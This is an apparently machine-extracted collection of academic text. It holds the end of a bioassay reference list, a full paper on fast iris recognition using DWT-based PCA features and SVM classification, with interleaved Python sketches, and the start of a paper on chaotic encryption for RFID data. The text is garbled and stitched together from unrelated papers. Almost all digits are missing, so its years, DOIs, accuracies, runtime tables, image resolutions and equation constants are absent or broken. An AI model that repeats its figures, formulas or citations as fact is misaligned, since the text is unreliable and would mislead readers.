modularization, integration and applications. journal of biomedical semantics ( ):s doi . / - - -s -s . bolton e. . reporting biological assay screening results for maximum impact. drug discovery today: technologies : – doi . /j.ddtec. . . . clark am, bunin ba, litterman nk, schürer sc, visser u. . fast and accurate semantic annotation of bioassays exploiting a hybrid of machine learning and user confirmation. peerj :e doi . /peerj. . clark am, williams aj, ekins s. . machines first, humans second: on the importance of algorithmic interpretation of open chemistry data. 
journal of cheminformatics ( ): doi . /s - - - . de souza a, bittker ja, lahr dl, brudz s, chatwin s, oprea ti, waller a, yang jj, southall n, guha r, schürer sc, vempati ud, southern mr, dawson es, clemons pa, chung tdy. . an overview of the challenges in designing, integrating, and delivering bard: a public chemical-biology resource and query portal for multiple organizations, locations, and disciplines. journal of biomedical screening ( ): – doi . / . ecker gf, williams-jones b. . editorial: open innovation in drug discovery. molecular informatics ( ): – doi . /minf. . gaulton a, bellis lj, bento ap, chambers j, davies m, hersey a, light y, mcglinchey s, michalovich d, al-lazikani b, overington jp. . chembl: a large-scale bioactivity database for drug discovery. nucleic acids research (database issue):d –d doi . /nar/gkr . helal ky, maciejewski m, gregori-puigjane e, glick m, wassermann am. . public domain hts fingerprints: design and evaluation of compound bioactivity profiles from pubchem’s bioassay repository. journal of chemical information and modeling ( ): – doi . /acs.jcim. b . hersey a, senger s, overington jp. . open data for drug discovery: learning from the biological community. future medicinal chemistry ( ): – doi . /fmc. . . kim s, thiessen pa, bolton ee, chen j, fu g, gindulyte a, han l, he j, he s, shoemaker ba, wang j, yu b, zhang j, bryant sh. . pubchem substance and compound databases. nucleic acids research (d ):d –d doi . /nar/gkv . schürer sc, vempati u, smith r, southern m, lemmon v. . bioassay ontology annotations facilitate cross-analysis of diverse high-throughput screening data sets. journal of biomolecular screening ( ): – doi . / . clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/cdd/bioassay-template http://dx.doi.org/ . /peerj-cs. #supplementalnformation http://dx.doi.org/ . /peerj-cs. #supplementalnformation http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /j.ddtec. . . http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . /minf. http://dx.doi.org/ . /nar/gkr http://dx.doi.org/ . /acs.jcim. b http://dx.doi.org/ . /fmc. . http://dx.doi.org/ . /nar/gkv http://dx.doi.org/ . / https://peerj.com/ http://dx.doi.org/ . /peerj-cs. soldatova ln, nadis d, king rd, basu ps, haddi e, baumié v, saunders nj, marwan w, rudkin bb. . exact : the semantics of biomedical protocols. bmc bioinformatics (suppl ):s doi . / - - -s -s . the gene ontology consortium. . gene ontology consortium: going forward. nucleic acids research (database issue):d –d . vempati ud, przydzial mj, chung c, abeyruwan s, mir a, sakurai k, visser u, lemmon vp, schürer sc. . formalization, annotation and analysis of diverse drug and probe screening assay datasets using the bioassay ontology (bao). plos one ( ):e doi . /journal.pone. . wang y, suzek t, zhang j, wang j, he s, cheng t, shoemaker ba, gindulyte a, bryant sh. . pubchem bioassay: update. nucleic acids research (database issue): d –d doi . /nar/gkt . williams aj, harland l, groth p, pettifer s, chichester c, willighagen el, evelo ct, blomberg n, ecker g, goble c, mons b. . open phacts: semantic interoperability for drug discovery. drug discovery today ( – ): – doi . /j.drudis. . . . williams aj, wilbanks j, ekins s. . why open drug discovery needs four simple rules for licensing data and models. plos computational biology ( ):e doi . /journal.pcbi. . willighagen el, waagmeester a, spjuth o, ansell p, williams aj, tkachenko v, hastings j, chen b, wild dj. . 
the chembl database as linked open data. journal of cheminformatics ( ): doi . / - - - . clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /nar/gkt http://dx.doi.org/ . /j.drudis. . . http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . / - - - https://peerj.com/ http://dx.doi.org/ . /peerj-cs. bioassay templates for the semantic web introduction methods results conclusion supporting materials references submitted november accepted march published april corresponding author mohammad ali moni, mohammad.moni@sydney.edu.au academic editor pablo arbelaez additional information and declarations can be found on page doi . /peerj-cs. copyright rana et al. distributed under creative commons cc-by . open access a fast iris recognition system through optimum feature extraction humayan kabir rana , md. shafiul azam , mst. rashida akhtar , julian m.w. quinn and mohammad ali moni , department of computer science and engineering, green university of bangladesh, dhaka, bangladesh department of computer science and engineering, pabna university of science and technology, pabna, bangladesh department of computer science and engineering, varendra university, rajshahi, bangladesh bone biology division, garvan institute of medical research, nsw, australia school of medical sciences, faculty of medicine and health, the university of sydney, sydney, australia abstract with an increasing demand for stringent security systems, automated identification of individuals based on biometric methods has been a major focus of research and development over the last decade. biometric recognition analyses unique physiological traits or behavioral characteristics, such as an iris, face, retina, voice, fingerprint, hand geometry, keystrokes or gait. the iris has a complex and unique structure that remains stable over a person’s lifetime, features that have led to its increasing interest in its use for biometric recognition. in this study, we proposed a technique incorporating principal component analysis (pca) based on discrete wavelet transformation (dwt) for the extraction of the optimum features of an iris and reducing the runtime needed for iris template classification. the idea of using dwt behind pca is to reduce the resolution of the iris template. dwt converts an iris image into four frequency sub-bands. one frequency sub-band instead of four has been used for further feature extraction by using pca. our experimental evaluation demonstrates the efficient performance of the proposed technique. subjects human–computer interaction, computer vision, security and privacy keywords biometrics, iris recognition, pca, dwt, gabor filter, hough transformation, daugman’s rubber sheet model introduction biometric recognition refers to the study of identifying persons based on their unique physical traits or behavioral characteristics (umer, dhara & chanda, ). physical characteristics commonly include an iris, face, fingerprint, retina, vein, voice or hand geometry, while behavioral characteristics may include handwriting, walking gait, signature, and typing keystrokes. to be useful, a biometric requires features that can be accurately analysed to provide unique, and stable information about a person that can be used reliably in authentication applications and many advances have been made in this area (naseem et al., ). the iris has easily accessible and unique features that are stable over the lifetime of an individual. 
for this reason, iris recognition technology has been widely studied in the field of information security. iris recognition systems can already be applied to identify individuals in controlled access and security zones, and could feasibly be how to cite this article rana hk, azam ms, akhtar mr, quinn jmw, moni ma. . a fast iris recognition system through optimum feature extraction. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:mohammad.moni@sydney.edu.au https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. figure the outer look of a human iris. the iris is a circular structure bounded by the sclera and pupil that controls the amount of light reaching the retina. full-size doi: . /peerjcs. /fig- used for verification of passengers at immigration, airports, stations, computer access at research organization, database access control in distributed systems etc. (galdi, nappi & dugelay, ). iris recognition systems can also be applied in the field of financial services such as banking services and credit card use, and such a system would not have the same vulnerabilities as passwords and numbers. iris recognition systems are being trialled in many countries for national id cards, immigration, national border control, airline crews, airport staffs, and missing children identification etc. (galdi, nappi & dugelay, ). while there are still some concerns about using iris-based recognition in mass consumer applications due to iris data capturing issues, it is widely believed that, in time, the technology is likely to find its way into common use (nabti & bouridane, ). an iris is a round contractile membrane of the eye, between sclera and pupil. it begins to form during embryo gestation, being fully formed at around eight months. the uniqueness of the iris patterns comes from the richness of the texture details arising from the crypts, radial furrows, filaments, pigment frills, flecks, stripes and arching ligaments. these give rise to complex and irregular textures that are so randomly distributed as to make the human iris one of the most reliable biometric characteristics. the iris is bounded by the pupil at the inner boundary and the sclera at its outer boundary. these inner and outer boundaries are circular in shape and easily accessible but can be partially blocked by the upper and lower eyelids and eyelashes (galdi, nappi & dugelay, ). figure shows a view of a typical human iris. in this paper, feature extraction techniques are the main focus. indeed, the selection of optimal feature subsets has become a crucial issue in the field of iris recognition. to improve feature extraction, we propose that an approach combining principal component analysis (pca) and discrete wavelet transformation (dwt) will extract the key features of an iris and thereby reduce image resolution and in turn the runtime of the classification or analysis that is required for the resulting iris templates. rana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure diagram of iris recognition system. here, hough transform, daugman’s rubber-sheet model, pca + dwt and svm are used for segmentation, normalization, feature extraction and classification re- spectively. full-size doi: . /peerjcs. 
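before the methodology is described in detail, a minimal sketch of the proposed dwt-then-pca idea is shown below, assuming the pywavelets and scikit-learn packages and normalized iris templates stored as 2-d numpy arrays; the wavelet and the number of retained components are illustrative choices, not values taken from the paper.

```python
import numpy as np
import pywt
from sklearn.decomposition import PCA

def extract_features(normalized_irises, n_components=50):
    """normalized_irises: array of shape (n_samples, height, width)."""
    ll_bands = []
    for template in normalized_irises:
        # one-level 2-D DWT; keeping only the low-frequency LL sub-band
        # halves each dimension of the template
        ll, (lh, hl, hh) = pywt.dwt2(template, "haar")
        ll_bands.append(ll.ravel())
    ll_bands = np.asarray(ll_bands)

    # PCA keeps the most discriminating directions of the reduced templates
    # (n_components must not exceed the number of enrolled samples)
    pca = PCA(n_components=n_components)
    features = pca.fit_transform(ll_bands)
    return features, pca
```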
/fig- methodology iris recognition processing generally consists of the following steps: (i) image acquisition (ii) iris segmentation (iii) normalization (iv) feature extraction and (v) classification. in our approach presented here, segmentation was achieved using the hough transform for localizing the iris and pupil regions. the segmented iris region was normalized to a rectangular block with fixed polar dimensions using daugman’s rubber sheet model. a combined pca and dwt were applied on a fixed size normalized iris for feature extraction. the support vector machine was used for classification the similarity between the iris templates. figure shows the system processes that we used for iris recognition. image acquisition the first step in iris recognition is image acquisition, i.e., the capture of a sequence of high-quality iris images from the subject. these images should clearly show the entire eye, but particularly the iris and pupil. preprocessing operations may be applied to the captured images in order to enhance their quality and provide sufficient resolution and sharpness (frucci et al., ). in this work, the casia-iris v database has been used instead of actual captured eye images (tieniu tan, ). casia-irisv is an extension of casia-irisv , and contains six subsets that include three subsets (from casia-irisv ), namely casia-iris-interval, casia-iris-lamp, and casia-iris-twins. the three new subsets added to casia-irisv are casia-iris-distance, casia-iris-syn and casia-iris- thousand respectively. center for biometrics and security research (cbsr) captured images of casia-iris-interval using their self-developed iris camera. iris images of casia- iris-interval is good for studying the texture features of iris. iris images of casia-iris- lamp were captured with a hand-held iris sensor, and these images are well-suited for finding problems of non-linear iris normalization and robust feature representation. cbsr rana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure iris segmentation using hough transformation. (a) original iris image; (b) edge mapped iris using first derivative or gradient; (c) edge detected iris image. full-size doi: . /peerjcs. /fig- collected iris images of casia-iris-twins during annual twins festival in beijing. casia- iris-twins data-sets are suitable for studying the similarities and dissimilarities between iris images of twins. casia-iris-distance images were captured by employing long-range multi-modal biometric image acquisition and recognition system. casia-iris-thousand database contains , iris images, which were captured using ikemb- camera. casia-iris-thousand images are suitable for experimenting the uniqueness of iris features and developing novel iris classification methods. casia-irisv contains a total , iris images. this includes samples from more than , genuine subjects and , virtual subjects. all iris images are -bit grey-level image and the file format is jpeg (tieniu tan, ). iris segmentation iris segmentation was used to isolate the actual iris region from a digital eye image. the iris region, (fig. ) can be bounded by two circles pertaining to the pupil (inner boundary) and sclera (outer boundary). hough transformation was employed to locate the circular iris region. hough transformation the hough transformation is a procedure generally used to compute the parameters of the geometric objects such as lines and circles in an image. 
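as a rough illustration of this circle-detection step (the voting procedure and its equation are detailed below), the snippet uses opencv's built-in hough detector on a grayscale eye image; the blur size, vote thresholds and radius ranges are placeholders that would need tuning for casia images, and the paper's own implementation may differ.

```python
import cv2

def locate_pupil_and_iris(eye_gray):
    """eye_gray: 8-bit grayscale eye image (numpy array)."""
    blurred = cv2.medianBlur(eye_gray, 5)   # suppress eyelash noise before edge voting

    # circles are found by voting in Hough space; smaller radii target the pupil,
    # larger radii the iris-sclera boundary (radius ranges are illustrative)
    pupil = cv2.HoughCircles(blurred, cv2.HOUGH_GRADIENT, dp=1, minDist=120,
                             param1=100, param2=30, minRadius=20, maxRadius=60)
    iris = cv2.HoughCircles(blurred, cv2.HOUGH_GRADIENT, dp=1, minDist=120,
                            param1=100, param2=30, minRadius=60, maxRadius=140)
    # each detected circle is returned as (x_c, y_c, r); None if no circle wins the vote
    return pupil, iris
```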
for detecting the center coordinates and radius of the iris and pupil regions, the circular hough transform can be used. this technique generally uses a voting procedure to find the shapes of the objects within the classes available. the hough segmentation algorithm first creates an edge map by computing the gradients, or first derivatives, of the intensity values in an eye image, as shown in fig. . for each edge pixel in the edge map, the surrounding points on circles at different radii are taken, and votes are cast to find the maximum values that constitute the parameters of circles in the hough space (verma et al., a). the center coordinates and the radius can be found using the following equation:

$x_c^2 + y_c^2 - r^2 = 0$

in the hough space, the maximum point corresponds to the center coordinates $(x_c, y_c)$, and the radius r of the circle is given by the edge points.

when performing the edge detection, we have considered derivatives/gradients in the vertical direction to detect the iris-sclera boundary and to decrease the effect of the eyelids, which are horizontally aligned (verma et al., a). the vertical gradients are taken for locating the iris boundary and reducing the influence of the eyelids. when performing the circular hough transformation, not all of the edge pixels that define the circle are required for successful localization. not only does this make circle localization more accurate, but it also makes it more efficient, since there are fewer edge points to cast votes in the hough space (verma et al., a).

normalization
once the circular iris region is successfully segmented from an eye image, normalization is applied to it to transform the segmented circular iris region into a fixed-size rectangular shape. the normalization process produces an iris region with fixed dimensions, so that two photographs of the same iris taken under different capturing environments will have the same characteristic features (verma et al., b). in this work, daugman's rubber-sheet model was used to normalize the iris image.

figure  daugman's rubber-sheet model used for iris normalization. the circular shape represents the segmented iris region and the rectangular shape represents the normalized iris, which is equivalent to the segmented iris region.

daugman's rubber-sheet model
daugman's rubber-sheet model is the most widely used method for iris normalization (daugman, ); it converts the circular iris region into a fixed-size rectangular block. using the mapping below, the model transforms every pixel in the circular iris into an equivalent position on the polar axes (r, θ), where r is the radial distance and θ is the rotated angle at the corresponding radius. the radial resolution describes the number of radial lines generated around the iris region, while the angular resolution is the number of data points in the radial direction.

$I[x(r,\theta), y(r,\theta)] \rightarrow I(r,\theta)$

the iris region is converted to a two-dimensional array: the horizontal dimension represents the angular resolution and the vertical dimension represents the radial resolution, as shown in fig. , where $I(x, y)$ corresponds to the iris region, and $(x, y)$ and $(r, \theta)$ are the cartesian and normalized polar coordinates, respectively. θ ranges from  to π and r ranges from $r_p$
to $r_l$. x(r, θ) and y(r, θ) are defined as linear combinations of pupil boundary points (daugman, ).

feature extraction
feature extraction is the most important and critical part of the iris recognition system. it is the process of reducing the amount of data required to describe the large set of information present in an iris pattern. the recognition rate and the classification time of two iris templates depend largely on an efficient feature extraction technique.

proposed technique for feature extraction
in this section, the proposed technique produces an iris template with reduced resolution, and hence reduced runtime for classifying the iris templates. to produce the template, dwt is first applied to the normalized iris image. dwt transforms the normalized iris image into four frequency sub-bands, namely ll, lh, hl and hh, as shown in fig. . the frequency range can be represented as ll < lh < hl < hh (ma et al., ; yu-hsiang, ). the ll sub-band represents the characteristics of the iris (acharya et al., ; moni & ali, ), so this sub-band can be considered for further processing (acharya et al., ; zhao et al., ).

figure  iris template using one level dwt. dwt transforms the normalized iris image into four frequency sub-bands, namely ll, lh, hl and hh.

figure  shows that the resolution of the original normalized iris image is ( × ). after applying dwt on the normalized iris image, the resolution of the ll sub-band is ( × ). the ll sub-band represents a lower-resolution approximation of the iris that retains the required characteristics, so this sub-band has been used instead of the original normalized iris data for further processing using pca. as the resolution of the iris template has been reduced, the runtime of the classification will be similarly reduced. pca finds the most discriminating information present in the ll sub-band to form the feature matrix shown in fig. , and the resultant feature matrix is passed to the classifier for recognition.

figure  iris template using pca based on the dwt.

the mathematical analysis of pca includes:
1. the mean of each vector is given by $x_m = \frac{1}{n}\sum_{k=1}^{n} x_k$.
2. the mean is subtracted from all of the vectors to produce a set of zero-mean vectors, $x_z = x_i - x_m$, where $x_z$ is the zero-mean vector, $x_i$ is each element of the column vector, and $x_m$ is the mean of each column vector.
3. the covariance matrix is computed as $c = [x_z^{T} \ast x_z]$.
4. the eigenvectors and eigenvalues are computed from $[c - \gamma i]e = 0$, where the $\gamma$'s are the eigenvalues and the $e$'s are the eigenvectors.
5. each eigenvector is multiplied with the zero-mean vectors $x_z$ to form the feature vector, given by $f_i = [x_z]e$.

classification
classification is the process of measuring the similarity between two iris templates generated in the feature extraction stage. this process gives one range of values when templates of the same iris are compared and another range of values when templates generated from different persons' eyes are compared (rana, azam & akhtar, ). this ultimately enables us to determine whether two iris templates belong to the same or different persons. in this work, the support vector machine was used to classify the iris images.
support vector machine
support vector machine (svm) performs pattern recognition based on the principle of structural risk minimization. svm is a binary classifier that optimally separates the two classes of data.

figure  svm with linear separable data. the svm finds the hyper-plane h ($w \cdot x + b = 0$) that differentiates the two classes of linearly separable data.

there are two major aspects of developing svm as a classifier. the first aspect is to determine the optimal hyperplane between two separate classes of data, and the other aspect is to transform a non-linearly separable classification problem into a linearly separable one (czajka et al., ). figure  shows an example of a linearly separable classification problem. let x be a set of input feature vectors and y the class labels. the input feature vectors and the class labels can be represented as $\{x_i, y_i\}$, where $i = 1, 2, \ldots, n$ and $y = \pm 1$. the separating hyperplane can be represented as

$w \cdot x + b = 0$

which implies

$y_i(w \cdot x_i + b) \ge 1, \quad i = 1, \ldots, n$

basically, $\{w, b\}$ can take numerous possible values that create a separating hyperplane. points often lie between the two data classes in such a way that there is always some margin between them. svm maximizes this margin by treating it as a quadratic optimization problem (barpanda et al., ). the svm can make two possible decisions during iris recognition: acceptance or rejection of a person.

algorithm
problem definition: the iris is a biometric characteristic that can be used to authenticate persons. this algorithm finds whether a person is authenticated or not using the iris. the objective is to recognize a person using iris segmentation, normalization, dwt, pca and the svm classifier; the general algorithm is given in table .

table  general algorithm of our proposed iris recognition system.
input: eye image
output: recognition of a person
(a) read the eye image.
(b) iris segmentation using hough transformation.
(c) iris normalization using daugman's model.
(d) the dwt is applied, and the ll sub-band is considered.
(e) pca is applied on the ll sub-band to form a feature vector.
(f) classification time measurement is started using a clock function.
(g) a match/non-match decision is obtained using the svm classifier.
(h) classification time measurement ends.

table  accuracy comparison of our proposed technique with others.
sl.  author              method         accuracy
     mh hamd et al.      pca             %
     sg firake et al.    gabor filter    . %
     j poonia et al.     gabor+pca       . %
     hk rana et al.      our proposed    . %

experimental results and discussions
in this section, the proposed technique has been evaluated on the casia iris database, and the results are reported. iris images of  individuals have been enrolled in our system database for training and other iris images for assessing the performance. an intel core-i  .  ghz processor,  gb ram, the windows-  operating system and matlab  a have been used as the experimental environment. in this study, we have developed an approach to reduce the runtime while keeping the accuracy as high as possible. the accuracy of our proposed technique is . % with far  % and frr  %, as shown in table , which is better than the other methods that are used for runtime comparison.
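before moving on to the runtime comparison below, here is a small sketch of the classification stage described above, assuming the feature vectors produced by the dwt+pca step and one label per enrolled subject; the linear kernel and the train/test split are shown only as one plausible setup, since the paper does not state its svm parameters.

```python
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC

def train_and_evaluate(features, labels):
    """features: (n_samples, n_features) array; labels: subject identifiers."""
    x_train, x_test, y_train, y_test = train_test_split(
        features, labels, test_size=0.3, random_state=0)

    clf = SVC(kernel="linear")      # illustrative kernel choice
    clf.fit(x_train, y_train)       # learn the separating hyperplanes

    accuracy = clf.score(x_test, y_test)   # accept/reject quality on unseen templates
    return clf, accuracy
```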
hamd & ahmed ( ) proposed a technique to compare two feature extraction methods, pca and fourier descriptors (fd), in which circular hough transform, daugman’s rubber sheet model and the manhattan classifier were used for segmentation, normalization, and classification respectively. their average accuracy for pca was %. firake & mahajan ( ) proposed a technique to compare three feature extraction methods, gabor filter, pca and independent component analysis (ica), in which hough transform, daugman’s rubber sheet model and hamming distance were used for segmentation, normalization, and classification respectively. their average accuracy was . % for gabor filter. jyoti poonia ( ) observed the average accuracy . % for gabor filter + pca based feature extraction technique. we have mainly evaluated the time required for classification of our proposed feature extraction techniques, and found classification-time of our proposed technique is significantly better than others. the experimental results are shown in table and fig. . rana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table comparison of classification-time of our proposed technique with others. runtime for each feature extraction technique has been reported by employing iris templates. the mean and median of each feature extraction technique have been calculated by considering the runtime of eight attempts. sl. methods runtime of iris templates in second time per attempt mean median . . . . . . . . pca based feature extraction . . . . . . . . . . . gabor filter based feature extraction . . . . . . . . . . . gabor filter + pca based feature extraction . . . . . . . . . . . proposed feature extraction technique . . . rana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparison of classification-time of our proposed technique with varying testing samples. full-size doi: . /peerjcs. /fig- conclusions in this paper, we proposed a technique that used principal component analysis (pca) based on discrete wavelet transformation (dwt) for extracting the optimum features of iris images and reducing the runtime of classification of these iris templates. the point of using dwt behind pca is to reduce the iris template resolution. dwt converts the iris image into four frequency bands, and one frequency band instead of four has been used for further feature extraction by using pca. as the resolution of iris template has been reduced by dwt, so the runtime of classification will be reduced. experimental evaluation using the casia iris image database (ver. ) clearly demonstrated the proposed technique performs in a very efficient manner. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • humayan kabir rana conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared rana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figures and/or tables, performed the computation work, authored or reviewed drafts of the paper. • md. shafiul azam conceived and designed the experiments, contributed reagents/mate- rials/analysis tools, authored or reviewed drafts of the paper. • mst. 
rashida akhtar prepared figures and/or tables, authored or reviewed drafts of the paper. • julian m.w. quinn approved the final draft, review and editing. • mohammad ali moni approved the final draft, review and editing. data availability the following information was supplied regarding data availability: the codes and raw data are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references acharya ur, mookiah mrk, koh je, tan jh, bhandary sv, rao ak, hagiwara y, chua ck, laude a. . automated diabetic macular edema (dme) grading system using dwt, dct features and maculopathy index. computers in biology and medicine : – doi . /j.compbiomed. . . . barpanda ss, sa pk, marques o, majhi b, bakshi s. . iris recognition with tunable filter bank based feature. multimedia tools and applications ( ): – doi . /s - - -z. czajka a, bowyer kw, krumdick m, vidalmata rg. . recognition of image- orientation-based iris spoofing. ieee transactions on information forensics and security ( ): – doi . /tifs. . . daugman jg. . high confidence visual recognition of persons by a test of statistical independence. ieee transactions on pattern analysis and machine intelligence ( ): – doi . / . . firake sg, mahajan pm. . comparison of iris recognition using gabor wavelet, principal component analysis and independent component analysis. international journal of innovative research in computer and communication engineering ( ): – doi . /ijircce. . . frucci m, nappi m, riccio d, di baja gs. . wire: watershed based iris recognition. pattern recognition : – doi . /j.patcog. . . . galdi c, nappi m, dugelay j-l. . multimodal authentication on smartphones: combining iris and sensor recognition for a double check of user identity. pattern recognition letters ( ): – doi . /j.patrec. . . . hamd mh, ahmed sk. . biometric system design for iris recognition using intelligent algorithms. international journal of modern education and computer science ( ): – . rana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.compbiomed. . . http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /tifs. . http://dx.doi.org/ . / . http://dx.doi.org/ . /ijircce. . http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . /peerj-cs. jyoti p, parvati b, sandeep kg, shubh lakshmi a. . new improved feature extraction approach of iris recognition. international journal of computer systems ( ): – . ma l, tan t, wang y, zhang d. . efficient iris recognition by characterizing key local variations. ieee transactions on image processing ( ): – doi . /tip. . . moni m, ali as. . hmm based hand gesture recognition: a review on techniques and approaches. in: computer science and information technology, . iccsit . nd ieee international conference on. piscataway: ieee, – . nabti m, bouridane a. . an effective and fast iris recognition system based on a combined multiscale feature extraction technique. pattern recognition ( ): – doi . /j.patcog. . . . naseem i, aleem a, togneri r, bennamoun m. . iris recognition using class-specific dictionaries. computers & electrical engineering : – doi . /j.compeleceng. . . . rana hk, azam ms, akhtar mr. . 
iris recognition system using pca based on dwt. sm journal of biometrics & biostatistics ( ): doi . /zenodo. . tieniu tan zs. . center for biometrics and security research. available at http: //www.cbsr.ia.ac.cn/china/iris% databases% ch.asp (accessed on november ). umer s, dhara bc, chanda b. . a novel cancelable iris recognition system based on feature learning techniques. information sciences : – doi . /j.ins. . . . verma p, dubey m, basu s, verma p. a. hough transform method for iris recognition—a biometric approach. international journal of engineering and innovative technology ( ): – . verma p, dubey m, verma p, basu s. b. daughman’s algorithm method for iris recognition—a biometric approach. international journal of emerging technology and advanced engineering ( ): – . yu-hsiang w. tutorial: image segmentation. graduate institute of communication engineering. available at http://disp.ee.ntu.edu.tw/meeting/%e % %b %e %bf% /segmentation% tutorial.pdf (accessed on november ). zhao h, wang j, ren x, li j, yang y-l, jin x. . personalized food printing for portrait images. computers & graphics : – doi . /j.cag. . . . rana et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /j.compeleceng. . . http://dx.doi.org/ . /zenodo. http://www.cbsr.ia.ac.cn/china/iris% databases% ch.asp http://www.cbsr.ia.ac.cn/china/iris% databases% ch.asp http://dx.doi.org/ . /j.ins. . . http://disp.ee.ntu.edu.tw/meeting/%e % %b %e %bf% /segmentation% tutorial.pdf http://disp.ee.ntu.edu.tw/meeting/%e % %b %e %bf% /segmentation% tutorial.pdf http://dx.doi.org/ . /j.cag. . . http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , application of chaotic encryption in rfid data transmission security yang jianfang school of computer science and engineering xi’an technological university xi’an, china e-mail: perfectyjf@ .com liu baolong school of computer science and engineering xi’an technological university xi’an, , china e-mail: liu.bao.long@hotmail.com yao huimin eighth of production plant, the company china petrdeum changing oilfield, xi’an xi’an, , china abstract—in order to improve the security performance of data transmission in the rfid system, the sequence generated by the chaotic map is used to encrypt the data transmitted between the reader and the tag in the rfid. based on the unpredictability, extreme sensitivity to initial conditions, and pseudo-random characteristics of chaotic sequences, the information of each electronic tag is encrypted with a unique chaotic sequence. the same operation mechanism is used to encrypt and decrypt data, and a security model based on chaotic encryption is established. at the same time, the read/write control mechanism and security issues are explained. keywords-chaotic encryption; chaotic sequence; rfid system; security model; i. introduction radio frequency identification (rfid), which is a wireless non-contact automatic identification technology, automatically identifies surrounding objects through radio frequency signals, spatial coupling (including inductive coupling and electromagnetic coupling). the basic components of rfid system mainly include background server, reader and tag. in the rfid data transmission, the wired transmission between background server and reader is considered as a secure channel, while the wireless transmission between reader and tag is considered as an unsafe channel. 
the basic components of the rfid system are shown in the figure: background server contr ol sectio n wireless transmissi on part reader tag data、energy interaction space coupling element wired channel wireless transmission secure channel unsafe channel figure . diagram of the components of the rfid system. rfid technology has been widely used in various fields due to its low cost, fast recognition speed and long service life, such as warehouse transportation management, train/car identification, baggage security inspection, access control attendance and so on. however, a lot of security problems have emerged in the process of widespread application of rfid, and it is precisely because of the remaining security problems of rfid technology that its further application and development are restricted. the security issues of rfid technology mainly come from the wireless transmission channel of readers and electronic tags, including privacy theft between authentication and data transmission. the authentication problem mainly includes the confirmation of the legality of readers and electronic tags, while the data privacy issues include tracking and leaking data information [ ]. the purpose of the rfid system is to popularize the application, which requires that the cost of the reader and the electronic tag in the rfid cannot be too high, and the overly complicated security algorithm cannot be used doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , in the tag, which creates a difficulty for the security solution of the rfid to some extent. in most of the currently proposed rfid system security solutions, it can be roughly divided into physical security methods, cryptographic-based security methods, and a combination of the two. the physical security method is mainly for the protection of electronic tags, including kill command mechanism, electrostatic shielding, blocking tags, active interference, etc [ ]. some of these methods can affect the functionality of the tag. for example, the kill command mechanism can't respond to the reader's commands by making the tag ineffective. this prevents the corrupted tag from being activated again and cannot be used again. although electrostatic shielding can shield the interference from illegal readers or tags, it can also make the tag unrecognizable by legitimate readers and cannot be used effectively. the blocking tag evades the legal tag by simulating a large number of tags, and the active interference is to protect the legitimate tag from being detected by sending unwanted electromagnetic signals to interfere or hinder the operation of the illegal reader. the security method based on cryptography may generally include a security protocol based on a hash function, an encryption algorithm, read and write access control and so on. chaos is a complex behavior controlled by nonlinear dynamic laws and is a similar random phenomenon that appears in deterministic systems. it has the characteristics of extreme sensitivity of initial values, long-term unpredictability, randomness, and similar broadband spectral noise. these characteristics make chaotic systems very suitable for information encryption [ ]. logistic mapping is one of the most typical types in chaotic systems. the content of this paper is mainly to use logistic chaotic map to generate chaotic sequences to encrypt the data transmitted between readers and tags in rfid system, which guarantees rfid system security to some extent. ii. 
chaotic sequence encrypts rfid transmission data

a. introduction to chaotic mapping
the essence of chaotic encryption is serial (stream) cipher encryption. the basic principle is to divide the plaintext data into multiple parts of continuous characters, then use the generated chaotic key-stream sequence to perform the encryption calculation with the plaintext characters bit by bit, and use the synchronously generated key stream when the sequence is decrypted. its basic schematic is shown below:

figure . data information encryption/decryption schematic (a key sequence generator on each side produces the key sequence $k_i$, which drives the encryption algorithm $e_k$ and the decryption algorithm $d_k$; cleartext information is turned into ciphertext, sent over the public channel, and recovered as cleartext with the help of a synchronization key).

the chaotic sequence generator is the core of chaotic encryption and is used to generate the chaotic key sequence, which is then converted into an encryption sequence for encrypting the plaintext information through the conversion operation. the chaotic sequence generator can be represented by the stages in the following figure:

figure . chaotic sequence generator process diagram (initial value converted to a real value → chaotic map iteration to generate the mapping sequence → the mapping sequence converted into the encryption sequence).

the chaotic map is an important part of the chaotic sequence generator, and its general form can be expressed as

$x_{n+1} = \mu x_n (1 - x_n)$

